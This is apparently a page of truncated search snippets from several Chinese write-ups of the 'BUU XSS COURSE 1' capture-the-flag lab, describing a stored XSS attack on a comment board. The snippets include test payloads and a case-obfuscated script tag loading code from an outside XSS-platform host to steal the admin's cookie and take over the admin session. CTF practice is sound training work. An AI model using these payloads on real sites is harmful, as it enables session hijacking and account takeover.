2|0BUU XSS COURSE 12|1题解这题点进去就两个窗口,一个吐槽的,一个登陆。但是没有注册页面所以没啥用,直接来吐槽先尝试弹窗alert(1),访问给的地址没有弹窗换个标签试试<IMG SRC="javascript.:alert('XSS');">,访问发现显示了一个不存在的图片,存在xss漏洞。靶机无法访问外网,用...
BUU XSS COURSE 1 分类:BUUCTFundefined 启动靶机 有留言板和登录功能,很明显是存储性xss,通过留言功能插入xss代码,获取cookie登录后台 先测试过滤 alert(1); 查看源代码发现script被过滤 好像只过滤了script 找一个xss平台或者自己用服务器接受cookie '"> 项目上线 获取到了cookiecookie : PHPSESSID=8339da05744002...
BUU XSS COURSE 1 题解 这题点进去就两个窗⼝,⼀个吐槽的,⼀个登陆。但是没有注册页⾯所以没啥⽤,直接来吐槽 先尝试弹窗alert(1),访问给的地址没有弹窗 换个标签试试<IMG SRC="javascript.:alert('XSS');">,访问发现显⽰了⼀个不存在的图⽚,存在xss漏洞。靶机⽆法访问外⽹,⽤内...
buusec_2019_xss_course_1Jo**hn 上传1.08 MB 文件格式 zip 北京联合大学 信息安全专业 XSS 注入课-靶机 1 点赞(0) 踩踩(0) 反馈 所需:1 积分 电信网络下载 高等数学 2024-12-09 11:19:16 积分:1 scrapy_for_zh_wiki 2024-12-09 11:18:16 积分:1 ...
BUU XSS COURSE 1 打开网页,发现有吐槽和登录两个窗口 尝试登录发现不行,也没有注册窗口,来到吐槽 输入的内容会在给的地址中显示出来 构造 alert(1) 1. 访问给的地址/#/view/afb178d8-47ea-4a7a-f9e1-c34d5ac3eef7,没有发现内容 重新构造 <IMG SRC...
XSS 打开后发现是留言板,这是存储型XSS的高发区 一般来说,XSS内容会被后台管理员查看,此时XSS内容可以将管理员浏览器的cookie上传到XSS后台,hacker查看cookie后,就可以获取平台的管理员权限。 这里使用XSS Platform 生成XSS payload,将 极限代码<sCRiPt/SrC=//0x.ax/Y7Pgty>写入留言板中。 之后在进入/view/...
BUU XSS COURSE 1 方向:存储型跨站脚本 留言后返回地址,访问时显示留言内容,故可插入脚本,让访问者对攻击者可控的服务器发起请求,进而获得其访问数据 HTTP_REFERER :http://web/backend/admin.php backend:后端的,后台的 admin访问了该留言,cookie用于区别身份,所以把自己的cookie改成admin的装自己是admin...
BUU XSS COURSE 1 打开网页,发现有吐槽和登录两个窗口 尝试登录发现不行,也没有注册窗口,来到吐槽 输入的内容会在给的地址中显示出来 构造 alert(1) 访问给的地址/#/view/afb178d8-47ea-4a7a-f9e1-c34d5ac3eef7,没有发现内容 重新构造 <IMG SRC...